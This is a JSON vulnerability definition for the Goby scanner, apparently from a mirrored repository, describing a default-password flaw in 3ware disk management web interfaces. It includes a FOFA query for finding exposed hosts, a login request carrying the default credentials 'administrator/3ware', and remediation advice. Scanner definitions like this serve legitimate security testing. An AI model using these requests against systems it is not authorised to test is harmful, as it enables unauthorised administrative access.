qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/3ware-default-password-vuln...

162 lines
5.7 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "3ware default password vulnerability",
"Description": "<p>3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Product": "3ware",
"Homepage": "http://www.3ware.tw/",
"DisclosureDate": "2022-03-31",
"Author": "13eczou",
"FofaQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"",
"GobyQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"",
"Level": "1",
"Impact": "<p>Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.info/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "whopwd=a&thepwd=3ware"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "TDMUSER",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "logged",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "whopwd=a&thepwd=3ware"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "TDMUSER",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "logged",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|(administrator/3ware)"
]
}
],
"Tags": [
"default Password"
],
"VulType": [
"default Password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "5.0",
"Translation": {
"CN": {
"Name": "3ware 默认口令漏洞",
"Product": "3ware",
"Description": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(0, 0, 0);\">3ware&nbsp;&nbsp;</span>是一款磁盘管理系统。该系统存在默认口令,<span style=\"color: rgb(53, 53, 53);\">攻击者可通过默认口令administrator/3ware漏洞控制整个平台使用管理员权限操作核心的功能。</span></span><br></p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p><span style=\"font-size: medium; color: rgb(53, 53, 53);\">攻击者可通过默认口令administrator/3ware漏洞控制整个平台使用管理员权限操作核心的功能。</span><br></p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "3ware default password vulnerability",
"Product": "3ware",
"Description": "<p>3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"VulType": [
"default Password"
],
"Tags": [
"default Password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink